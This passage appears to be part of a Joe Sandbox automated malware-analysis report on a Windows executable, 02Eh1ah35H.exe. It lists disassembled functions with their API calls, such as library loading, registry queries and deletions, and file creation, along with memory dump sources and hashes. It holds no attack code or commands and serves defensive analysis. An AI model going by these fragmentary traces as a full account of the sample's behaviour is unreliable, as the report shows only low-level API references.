                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 004020FB
                                                                                                                                                                                  • Part of subcall function 00405456: lstrlenW.KERNEL32(007A0F28,00000000,0079A700,76F423A0,?,?,?,?,?,?,?,?,?,0040338D,00000000,?), ref: 0040548E
                                                                                                                                                                                  • Part of subcall function 00405456: lstrlenW.KERNEL32(0040338D,007A0F28,00000000,0079A700,76F423A0,?,?,?,?,?,?,?,?,?,0040338D,00000000), ref: 0040549E
                                                                                                                                                                                  • Part of subcall function 00405456: lstrcatW.KERNEL32(007A0F28,0040338D,0040338D,007A0F28,00000000,0079A700,76F423A0), ref: 004054B1
                                                                                                                                                                                  • Part of subcall function 00405456: SetWindowTextW.USER32(007A0F28,007A0F28), ref: 004054C3
                                                                                                                                                                                  • Part of subcall function 00405456: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E9
                                                                                                                                                                                  • Part of subcall function 00405456: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405503
                                                                                                                                                                                  • Part of subcall function 00405456: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405511
                                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040210C
                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,000000F7,?,?,?,?,00000008,00000001,000000F0), ref: 00402189
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 334405425-0
                                                                                                                                                                                • Opcode ID: af319a29290b029ce5fddf05959ec8084cbb0a0163aa5ce5a800cf6ae1bf2954
                                                                                                                                                                                • Instruction ID: a0686faca365a727748c0602422b19a99e1e577425e3ae8133f46283b43b75e6
                                                                                                                                                                                • Opcode Fuzzy Hash: af319a29290b029ce5fddf05959ec8084cbb0a0163aa5ce5a800cf6ae1bf2954
                                                                                                                                                                                • Instruction Fuzzy Hash: 63219671600104EBCF10AFA5CE49A9E7A71AF55358F70413BF515B91E0CBBD8E829A2E
                                                                                                                                                                                Function 00401B9B Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00401C0B
                                                                                                                                                                                • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C1D
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Global$AllocFree
                                                                                                                                                                                • String ID: Call
                                                                                                                                                                                • API String ID: 3394109436-1824292864
                                                                                                                                                                                • Opcode ID: c08fe461fcbc7eb508863a6e274c322000732a28328c89134215c3cfb5836e23
                                                                                                                                                                                • Instruction ID: 2334a48e4172ebb904b3f5af91f3a45bddc9a396230004d4704967bba2e99f69
                                                                                                                                                                                • Opcode Fuzzy Hash: c08fe461fcbc7eb508863a6e274c322000732a28328c89134215c3cfb5836e23
                                                                                                                                                                                • Instruction Fuzzy Hash: 822162736001109BDB20AF64DDC495A73B4AB18328725453BF952F72D0C6B8A8508BAD
                                                                                                                                                                                Function 00402522 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000033,00020019), ref: 00402553
                                                                                                                                                                                • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsbF672.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 004025F5
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseQueryValue
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3356406503-0
                                                                                                                                                                                • Opcode ID: 8d3d9d412d4888d3c3e3282b3648761cf87a4cea446e4038cc6d0bf9c2fd6c8d
                                                                                                                                                                                • Instruction ID: ca3dd7d1b7a13d3c8a9a28b827632004175b2a1fd75c59dcebef83c1aa991e75
                                                                                                                                                                                • Opcode Fuzzy Hash: 8d3d9d412d4888d3c3e3282b3648761cf87a4cea446e4038cc6d0bf9c2fd6c8d
                                                                                                                                                                                • Instruction Fuzzy Hash: 00113AB1911219EBDF14DFA4DE589AEB774FF04354B20843BE402B62D0D7B88A44DB6E
                                                                                                                                                                                Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                                • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                                • Opcode ID: 450ddb0a52dde23e6c3e7e65707e0a17b99b7c6dada291b67ac9213214883537
                                                                                                                                                                                • Instruction ID: 3e9f44f44444eb33be3e1f1d809517d1ef13f380758e007b8d3e22890c14ce30
                                                                                                                                                                                • Opcode Fuzzy Hash: 450ddb0a52dde23e6c3e7e65707e0a17b99b7c6dada291b67ac9213214883537
                                                                                                                                                                                • Instruction Fuzzy Hash: 0301F432624220ABE7195B389D05B2A3698E751318F10C13FF855F6AF1EA78CC02DB4D
                                                                                                                                                                                Function 0040242C Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033,00000002), ref: 0040244E
                                                                                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00402457
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseDeleteValue
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2831762973-0
                                                                                                                                                                                • Opcode ID: 3b2b3679bd27be8986a20790fb1aa9d433e7eb96043e8b231018ce36cdcb7856
                                                                                                                                                                                • Instruction ID: b1f28ea4fe1f397702134e154a5d50ad3aafc71d487b2ad51b946e19fd30fa70
                                                                                                                                                                                • Opcode Fuzzy Hash: 3b2b3679bd27be8986a20790fb1aa9d433e7eb96043e8b231018ce36cdcb7856
                                                                                                                                                                                • Instruction Fuzzy Hash: 3CF09672A00120ABDB10AFA89B4DAAE73B5AF45314F12443FF651B71C1DAFC5D01963E
                                                                                                                                                                                Function 00401EDE Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 00401EFC
                                                                                                                                                                                • EnableWindow.USER32(00000000,00000000), ref: 00401F07
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Window$EnableShow
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1136574915-0
                                                                                                                                                                                • Opcode ID: a206bc09d31208a55ef0f8a5c470fd50e96019e1354e9f0dd429e4c405301b30
                                                                                                                                                                                • Instruction ID: a2c3742fa11dc5cf357e4fc2c1b39d3237f925362780464401897514ce5169fc
                                                                                                                                                                                • Opcode Fuzzy Hash: a206bc09d31208a55ef0f8a5c470fd50e96019e1354e9f0dd429e4c405301b30
                                                                                                                                                                                • Instruction Fuzzy Hash: 64E09A72A042009FD704EFA4AE488AEB3B4EB90325B20497FE401F20C1CBB85D00862E
                                                                                                                                                                                Function 00401573 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ShowWindow
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1268545403-0
                                                                                                                                                                                • Opcode ID: ed0fba548ae3e193f0e5ef583f5be9fd2d24872a13bb97bcc89e0a3ab6842b84
                                                                                                                                                                                • Instruction ID: b2fefa23d47a0510f6e3c17d58d1e446f1e854612225740054352d4863a47d08
                                                                                                                                                                                • Opcode Fuzzy Hash: ed0fba548ae3e193f0e5ef583f5be9fd2d24872a13bb97bcc89e0a3ab6842b84
                                                                                                                                                                                • Instruction Fuzzy Hash: 5CE0BF76B24114ABCB18DFA8ED90C6E77B6EB95310720847AE512B3690C679AD10CB68
                                                                                                                                                                                Function 004067E3 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleHandleA.KERNEL32(?,00000020,?,00403514,0000000B), ref: 004067F5
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00406810
                                                                                                                                                                                  • Part of subcall function 00406773: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040678A
                                                                                                                                                                                  • Part of subcall function 00406773: wsprintfW.USER32 ref: 004067C5
                                                                                                                                                                                  • Part of subcall function 00406773: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 004067D9
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28254037371.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_02Eh1ah35H.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2547128583-0
                                                                                                                                                                                • Opcode ID: 04b739db586b670126c7119b566f03dd1efc4ec82adb23a6bbf3e60323b3d7ce
                                                                                                                                                                                • Instruction ID: 99a4bc67a8c43757839ce5658996565e88f4cb2ecc15aeea03f34014f97f3c52
                                                                                                                                                                                • Opcode Fuzzy Hash: 04b739db586b670126c7119b566f03dd1efc4ec82adb23a6bbf3e60323b3d7ce
                                                                                                                                                                                • Instruction Fuzzy Hash: F2E0863350521056E611AA719D44C7773AC9F89650307843EF946F2080D738DC31ABBD
                                                                                                                                                                                Function 00405EE4 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,00403055,C:\Users\user\Desktop\02Eh1ah35H.exe,80000000,00000003,?,00000007,00000009,0000000B), ref: 00405EE8
                                                                                                                                                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000007,00000009,0000000B), ref: 00405F0A
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000000.00000002.28253136244.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                • Associated: 00000000.00000002.28253101545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253173112.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000000.00000002.28253207559.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
